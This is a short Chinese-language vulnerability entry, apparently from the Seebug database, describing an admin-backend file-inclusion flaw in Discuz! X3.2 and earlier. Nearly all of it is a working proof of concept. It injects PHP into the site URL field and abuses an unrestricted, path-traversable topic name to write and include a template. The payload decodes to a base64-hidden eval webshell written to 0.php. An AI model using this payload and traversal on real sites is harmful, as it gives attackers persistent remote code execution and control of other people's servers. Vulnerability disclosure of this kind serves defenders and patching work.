Lucene search

K
seebugRootSSV:93597
HistoryJun 20, 2014 - 12:00 a.m.

Discuz3.2后台文件包含漏洞可后台拿shell

2014-06-2000:00:00
Root
www.seebug.org
21

简要描述:

最新版本:Discuz! X3.2 Release 20140618
包括以前版本

详细说明:

由于创建专题时未对

静态化名称

做任何限制引发此漏洞
1.全局->站点信息
网站 URL: http://www.comsenz.com/#<?php file_put_contents(‘0.php’,base64_decode(‘PD9waHAgQGV2YWwoJF9QT1NUW2FdKTsgPz4=’));?>

<img src=“https://images.seebug.org/upload/201406/192353349f86a439f18b016b61d4f94c3a57ad64.jpg” alt=“1.jpg” width=“600” onerror=“javascript:errimg(this);”>

2.工具->更新缓存

<img src=“https://images.seebug.org/upload/201406/192354012759b20e4267a2e59035e3e990b87a67.jpg” alt=“2.jpg” width=“600” onerror=“javascript:errimg(this);”>

3.门户->HTML管理
静态文件扩展名: htm
专题HTML存放目录:data/cache

<img src=“https://images.seebug.org/upload/201406/192354199f497eacfcb321e09bc57e513077f459.jpg” alt=“3.jpg” width=“600” onerror=“javascript:errimg(this);”>

4.创建专题
静态化名称[此处未做任何限制]:…/…/template/default/portal/portal_topic_test

<img src=“https://images.seebug.org/upload/201406/19235437a2a5497676c21314b3641be4d6730b2e.jpg” alt=“4.jpg” width=“600” onerror=“javascript:errimg(this);”>

5.专题管理
对刚添加的专题 开启 并生成

<img src=“https://images.seebug.org/upload/201406/192354484acd17b5898bcf7277e37d1eae4deb84.jpg” alt=“5.jpg” width=“600” onerror=“javascript:errimg(this);”>

6.再次创建专题
模板名 选择刚生成的 ./template/default/portal/portal_topic_test.htm
提交

<img src=“https://images.seebug.org/upload/201406/192355165e3b0c76559e082161941aabae2505f1.jpg” alt=“6.jpg” width=“600” onerror=“javascript:errimg(this);”>

就执行了php代码 <?php file_put_contents(‘0.php’,base64_decode(‘PD9waHAgQGV2YWwoJF9QT1NUW2FdKTsgPz4=’));?>
不仅仅是可以生成到专题目录,可以生成到任何可以包含的下面!

漏洞证明:

<img src=“https://images.seebug.org/upload/201406/192355354bce3eb481b7c0ff1b6d234978ec8685.jpg” alt=“7.jpg” width=“600” onerror=“javascript:errimg(this);”>